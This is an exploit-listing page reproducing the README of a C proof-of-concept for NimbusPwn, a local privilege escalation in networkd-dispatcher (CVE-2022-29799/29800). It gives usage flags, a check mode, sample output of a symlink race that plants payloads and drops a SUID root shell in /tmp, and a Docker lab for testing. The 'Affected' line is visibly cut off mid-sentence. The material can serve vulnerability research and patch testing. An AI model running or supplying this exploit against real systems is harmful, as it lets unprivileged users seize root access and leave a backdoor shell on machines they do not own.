Exploit for Path Traversal in Microsoft CVE-2022-29799

Name: Exploit for Path Traversal in Microsoft CVE-2022-29799
Rating: 5 (5 reviews)
2026-06-17 | CVSS 5.5
## https://sploitus.com/exploit?id=7C677A10-9FA7-51FB-8E47-4CC7BE2CF1F8
NimbusPwn — networkd-dispatcher 


    
    
      
    
    


## 📜 Description
A C PoC for NimbusPwn, a local privilege escalation in `networkd-dispatcher`. An unprivileged user claims the `org.freedesktop.network1` D-Bus name and sends a crafted `OperationalState`. The root daemon does not sanitize it (CVE-2022-29799, path traversal), and a symlink race on the script directory (CVE-2022-29800, TOCTOU) makes it run an attacker-planted script as root — dropping a SUID root shell.

**Affected:** `networkd-dispatcher  [!NOTE]
> Other distros: `dnf install gcc dbus-devel pkgconf` (Fedora/RHEL) or `pacman -S gcc dbus pkgconf` (Arch). The compile line is the same.

## ⚙️ Usage
Run as an unprivileged user on a vulnerable host.

```bash
./nimbuspwn [-c] [-s SHELL]
  -c, --check        non-breaking vuln check, no exploitation
  -s, --shell SHELL  shell to SUID-copy and spawn as root (default /bin/sh)
  -h, --help         show help
```

Check first (safe, plants nothing, never races):

```bash
$ ./nimbuspwn --check
[+] owned org.freedesktop.network1
[+] verdict: likely vulnerable (org.freedesktop.network1 is claimable, no privesc tried)
```

Then exploit:

```bash
$ ./nimbuspwn
[*] shell=/bin/sh drop=/tmp/sh attempts=10
[+] owned org.freedesktop.network1
[@] attempt 1 (/tmp/nimbuspwn_93732)
[+] planted 126 payloads (root-owned /sbin execs) in /tmp/nimbuspwn_93732
[*] OperationalState: ../../../tmp/nimbuspwn_93732/poc
[*] signal sent (serial 3)
[@] symlink swapped, waiting for root exec
[+] root backdoor at /tmp/sh, spawning shell
# id
uid=1000(pwn) gid=1000(pwn) euid=0(root) groups=1000(pwn)
```

The race is non-deterministic, so it retries (default 10×). Use `-s /bin/bash` on hosts without `/bin/sh`.

## 🐋 Docker PoC
A self-contained vulnerable lab (Ubuntu 20.04 + vulnerable networkd-dispatcher 2.0). No `--privileged` or host networking.

```bash
docker compose build
docker compose run --rm nimbuspwn-lab
# inside, as user 'pwn':
./nimbuspwn
```

The 2.0 dispatcher is vendored in `docker/` so the build does not depend on any external download. Dispatcher log: `/var/log/dispatcher.log`.

## 🕵🏼 References
- Microsoft: https://www.microsoft.com/en-us/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/
- Upstream: https://gitlab.com/craftyguy/networkd-dispatcher

## 📢 Disclaimer
This tool is provided for educational and research purposes only. The creator assumes no responsibility for any misuse or damage caused by the tool.